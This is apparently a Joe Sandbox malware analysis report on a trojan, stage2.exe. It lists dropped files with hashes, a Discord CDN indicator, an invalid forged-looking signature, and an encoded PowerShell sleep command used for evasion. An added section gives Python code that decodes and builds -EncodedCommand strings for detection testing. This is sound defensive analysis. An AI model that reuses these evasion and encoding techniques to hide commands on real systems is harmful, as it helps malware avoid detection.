Detection: MAL
Classification: mal72.troj.evad.winEXE@8/14@1/2
EGA Information:
• Successful, ratio: 66.7%
HDC Information:
• Successful, ratio: 96.4% (good quality ratio 85.7%)
• Quality average: 71.6%
• Quality standard deviation: 34.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 72
• Number of non-executed functions: 8
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 13.89.179.12
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
• Execution Graph export aborted for target stage2.exe, PID 7084 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

Time | Type | Description
02:24:21 | API Interceptor | 67x Sleep call for process: powershell.exe modified
02:25:42 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

Match: 162.159.130.233

                                                      Domains

Match: cdn.discordapp.com

                                                      ASN

Match: CLOUDFLARENETUS

                                                      JA3 Fingerprints

Match: 3b5074b1b5d032e5620f69f9f700ff0e

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_stage2.exe_71132b2d46f2be7ca5f7ca27edcda1a773a522_f347d55b_0069b9d6\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.213468288928447
                                                      Encrypted:false
                                                      SSDEEP:192:OOGYNnugoHBUZMXmAMaPbFx3iIQ/u7sdS274ItrW:mYNnOBUZMXmAMayIQ/u7sdX4ItrW
                                                      MD5:001C5A8A35F2A1BC8E8B554AAD9D99FB
                                                      SHA1:14FB74DBD5C503FD7CAEE5454006BBC8F5D38A9F
                                                      SHA-256:5B31C7776A10B1EF5250A21468601C317530F710D1825100DFA2344B5397D5AD
                                                      SHA-512:0DA7DC6F44012F114B3A905DA3E7E4DA70BCCF075F4830F10EFA1BB49EDB41445D7E684011569D31EC651BE13414C0558D003C1931A78C930CD51583CB8EBAEF
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.8.8.8.7.3.0.7.3.8.2.6.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.8.8.8.7.4.1.3.3.2.0.1.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.b.4.c.0.5.7.-.f.5.c.4.-.4.c.3.b.-.9.f.9.0.-.4.e.0.f.5.3.a.3.7.8.9.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.a.4.c.1.c.c.-.3.7.f.f.-.4.5.9.4.-.8.e.8.7.-.1.0.0.6.c.0.a.2.e.6.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.t.a.g.e.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.T.b.o.p.b.h...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.c.-.0.0.0.1.-.0.0.1.c.-.0.8.c.a.-.0.0.5.c.8.c.0.b.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.c.2.0.c.f.5.e.9.6.c.6.9.c.0.3.a.3.e.0.a.a.e.0.d.7.e.2.8.e.b.0.0.0.0.0.0.0.0.0.!.0.0.0.0.1.6.5.2.5.c.b.2.f.d.8.6.d.c.e.8.4.2.1.0.7.e.b.1.b.a.6.1.7.4.b.2.3.f.1.8.8.5.3.7.!.s.
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER14DB.tmp.dmp
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Mon Jan 17 10:25:36 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):273022
                                                      Entropy (8bit):3.853179800245628
                                                      Encrypted:false
                                                      SSDEEP:3072:cGlpb60CrUCgU/aDDrs0wTcjd+p+otu9gIOgF5oaIq:cGlwXTjCDDQ00p+79RpD
                                                      MD5:47039F84D9CE3BB540A5FF9C7A61CF31
                                                      SHA1:85474DBDAB51F24FA6D607CC52DC64AAEB7B50B2
                                                      SHA-256:C9804775D078275DF81CF7CFFF3FBACCBD3BD9320912BA0976EFEDCAE3010692
                                                      SHA-512:357F888EDC052948B989FEFD8E8195F80C834D85E4F019887F0D5810AAA3B53691ACA450D4CF66D4DB98EAACF4463904E78E456EA7F2E6A7FC40D774E06737DB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: MDMP....... ....... D.a........................X!..(.......T....*.......'...X..........`.......8...........T............]...............*...........,...................................................................U...........B......X-......GenuineIntelW...........T............C.a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER318C.tmp.WERInternalMetadata.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8390
                                                      Entropy (8bit):3.6933539692953867
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNisE6isU6YFfSU6PgmfZjQSnCpr/89bq4sfxDum:RrlsNi36isU6Y9SU6PgmfdQS/qrf1
                                                      MD5:0306EC771A2FC951837BE91CFBF8E011
                                                      SHA1:3A272CDBEA785BE069408708146463007864479B
                                                      SHA-256:8335F027896C9E2A3D22A7B4DEBDD792618D2F87BF1A92B82685CBA121F160E6
                                                      SHA-512:94C083DAA372FE2F7B40155FABCE226B4D09AA8C1BBA7DBAC71574C488B11C03E8F35ED334CB7C11DF4C4D277876631CEC2F52926393233BEB8648D34D522656
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.4.<./.P.i.d.>.......
                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3611.tmp.xml
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4725
                                                      Entropy (8bit):4.437433265070294
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsaJgtWI9jMXjSWSC8BQs8fm8M4JNfJF7EI+q8vjfBnLf2S9SNd:uITfoEMXjzSNORJzK1L2S9SNd
                                                      MD5:507EFECDC1ABF8B2E8511E0F7A40ABB0
                                                      SHA1:0E29D507CD2497027B125A0C9C2B13D06A084595
                                                      SHA-256:AC230930084B32AC3153DA023ACE28A1C3614C28E833BF3A3EB4D8F02C4E2482
                                                      SHA-512:44239E9BE6D2B9E6F33B989698A835DBCFB49F0765FAA03C99149A193C1FF6A85D0FD1147A31EBC26A97DFC3C9D6C919EA9ABD9D982C187DEC496DD32AE4B798
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1346136" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5829
                                                      Entropy (8bit):4.8968676994158
                                                      Encrypted:false
                                                      SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                      MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                      SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                      SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                      SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):16360
                                                      Entropy (8bit):5.56095611490378
                                                      Encrypted:false
                                                      SSDEEP:384:nt9/62zDkCGm9M3i6b+cBSBKnQultIK8tpRuFZU9NnaqYCy:+YGm+3J74KQultAnRo+ajV
                                                      MD5:251C0346B0D4B607AE0308E7A63905CC
                                                      SHA1:259BD3A23B07329B366836FEABFC5C375C2CFD98
                                                      SHA-256:ABD1AC4894EA5AC7AF272589E97472DFA394A8B3E0A92120732E551978952D42
                                                      SHA-512:45A9CCB3AD2146A584CBFE34BEFF38789D2811F12388F3078444CCEB52C203E47957906DB42311EA00CAC6E322DB5460B255F1E11EA1225254ADB8CCF1FE4BA1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview: @...e...............................[.B.:.u..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3hiw1gde.haw.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfyzxky1.kbr.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kw2ltvwn.ds0.psm1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0qgkhds.0yb.ps1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview: 1
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.7m2ZOLtQ.20220117022409.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.124059992328832
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAexvBnGx2DOXUWj5i5WiHjeTKKjX4CIym1ZJXnBWnxSAZgS:BZavhGoOziqDYB1ZdB4ZZgS
                                                      MD5:BBD1DFD615841C5948E4F29E6C82F116
                                                      SHA1:DD38516AE01450D37B9C323A441FCAA51E9D948C
                                                      SHA-256:46C7D5E25E092B25F45D7832CCE18B4FDBE5F3B2F30FDB9E7F05172A6F1CE603
                                                      SHA-512:F727C3068F7F45758F571F1ED85C002EED9D1E49074F2277B1A0D25B18D68D270054762D108CEB3B5ABE264520B6A72E8AFB7AB401C999981EE3F0AD72466E49
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022418..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022419..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117022742..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117022742..**********************..
                                                      C:\Users\user\Documents\20220117\PowerShell_transcript.082561.vEnUoizJ.20220117022446.txt
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):975
                                                      Entropy (8bit):5.129269732116244
                                                      Encrypted:false
                                                      SSDEEP:24:BxSAixvBnGx2DOXUWj5i5WUHjeTKKjX4CIym1ZJX2nxSAZW:BZevhGoOzUqDYB1ZOZZW
                                                      MD5:B5EF0789C51BC25618A8B8380106F073
                                                      SHA1:C4B515F96607777B8ECCF44C84F014744D7C8AD3
                                                      SHA-256:6CF2DBD9945C70552992020AA9F6F0028209C8EAE18D1B080ABF9E75C5A25750
                                                      SHA-512:2D04D6AF284F7D97C3157A211B85A21AD8ACBF760D5A10C101A67212EE44204B3FFF9DBB37892258D50CB32B053CFDBE7635C76A93E2D65113509325A5F6136D
                                                      Malicious:false
                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20220117022458..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 082561 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==..Process ID: 7140..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220117022458..**********************..PS>Start-Sleep -s 10..**********************..Command start time: 20220117023016..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 20220117023016..**********************..
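The two transcripts above record the host application as `powershell.exe -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==`. `-EncodedCommand` takes base64 over UTF-16LE rather than UTF-8, which is why the token has the telltale `AGEAcgB0` shape (every second byte is 0x00). The Python below is an added example for this report, not code from the sandbox or the sample: it pulls the encoded argument out of a recorded command line, decodes it, and re-encodes a script the same way so a detection rule can be checked against a known value. The command line is the one from the transcripts; the `-ExecutionPolicy` line is a constructed negative case, included because a naive `-e.*` pattern would match it.

```python
"""Decode and build PowerShell -EncodedCommand arguments (added example)."""
import base64
import re
from typing import Optional

# Command line as recorded in the PowerShell transcripts of this analysis.
SAMPLE_CMDLINE = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    "-enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA=="
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are
# the spellings seen in the wild. The alternation is anchored so that
# -ExecutionPolicy (also starting with "-e") is not mistaken for it.
_ENC_RE = re.compile(
    r"(?:^|\s)[-/](?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/]+={0,2})",
    re.IGNORECASE,
)


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form PowerShell expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the base64 token following an -EncodedCommand switch, or None."""
    m = _ENC_RE.search(cmdline)
    return m.group(1) if m else None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the script carried by -EncodedCommand; None if the switch is absent.

    Raises ValueError on malformed base64 or on a payload that cannot be
    UTF-16LE (odd length), which is what you want in a triage pipeline:
    a half-copied token should fail loudly rather than decode to garbage.
    """
    token = extract_encoded_argument(cmdline)
    if token is None:
        return None
    raw = base64.b64decode(token, validate=True)   # binascii.Error is a ValueError
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even number of bytes")
    return raw.decode("utf-16-le").rstrip("\0")


if __name__ == "__main__":
    print(decode_encoded_command(SAMPLE_CMDLINE))
    print(encode_command("Start-Sleep -s 10"))
```

Round-tripping the decoded text through `encode_command` reproduces the exact token from the transcript, so the same function can generate test strings for a Sigma or EDR rule that keys on `-enc`/`-EncodedCommand`. Note that PowerShell also honours `-e` and `-ec`, so a rule matching only the literal `-enc` misses trivially rephrased command lines.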
                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1572864
                                                      Entropy (8bit):4.2717574458854735
                                                      Encrypted:false
                                                      SSDEEP:12288:7XBO1fBqU8EJBPgZy54wpZkRyo2Fqhn4agUVxYqolztxIQaLyHYaPeK:jBO1fBqU8EJBPgbE
                                                      MD5:374743508B8FDB08634F0B0FBB5571B8
                                                      SHA1:B86A1ED991E72FC4B4D930AB33BBA15CB1B0FB26
                                                      SHA-256:45420FB69A145CE87CB8B4B442D93AAF2A167AD97FF2C0B02A4FC7F6C5F1E1A8
                                                      SHA-512:016B1471EDF41C095AB092B75AC2C12FD86A1A16EC10929DB709B0276A01707FA3ABA4D5BA41784C5F49E41490EF1AAD312F3F506013F62F0FD163B06730630D
                                                      Malicious:false
                                                      Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..I.................................................................................................................................................................................................................................................................................................................................................j.B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):4.038364930198759
                                                      Encrypted:false
                                                      SSDEEP:384:FOl/5Rftx1GPJ4XZsFknM7ktPBqXWSeq5QMVyi6+/ml4Lk4KZd1DoXzkNKcmLzdE:olBRftx18J4XuFkM7KBqX9eq5QMVyi6e
                                                      MD5:1E6B5359110A436CD426A10C18A64BD9
                                                      SHA1:233D103FF0DF3EFD1788D1793E2DC82660BE1646
                                                      SHA-256:6EC713C240E5C0E01BEC5D131A8263237F04CB2D77EC465FC7914CA090BB8DEC
                                                      SHA-512:339ADC6FA78B9DD339F29002B4E53BDA4F70611231379A6BA638F92656B60F3DC1E6573D76DAF5A76177BD6EA3E451147A01A59707BEB75B1542CF4DA37AD933
                                                      Malicious:false
                                                      Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..I.................................................................................................................................................................................................................................................................................................................................................l.B.HvLE.^......Y...........&I/......ME............0................... ..hbin................p.\..,..........nk,...I..................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...I......... ........................... .......Z.......................Root........lf......Root....nk ...I......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.133399721297699
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:stage2.exe
                                                      File size:214944
                                                      MD5:14c8482f302b5e81e3fa1b18a509289d
                                                      SHA1:16525cb2fd86dce842107eb1ba6174b23f188537
                                                      SHA256:dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
                                                      SHA512:fdaaac4ee73db90f69dc43a20f24d8f80a2f659288d28538c6fd1946b8861bb161b41ad3bcd65d16843cd21350e95c606f991a990110e100029b58abce978353
                                                      SSDEEP:3072:vf1GlJZUnjNbGgNQfYySIHiP1WLz4PcSOvG2jxZ:FbGoJ8iP19PjmGyf
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:E.a.................B...D......Na... ........@.. ....................................@................................

                                                      File Icon

                                                      Icon Hash:b270f086c6c2caf0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x40614e
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                      Time Stamp:0x61DC453A [Mon Jan 10 14:39:54 2022 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:v4.0.30319
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                      Signature Validation Error:The digital signature of the object did not verify
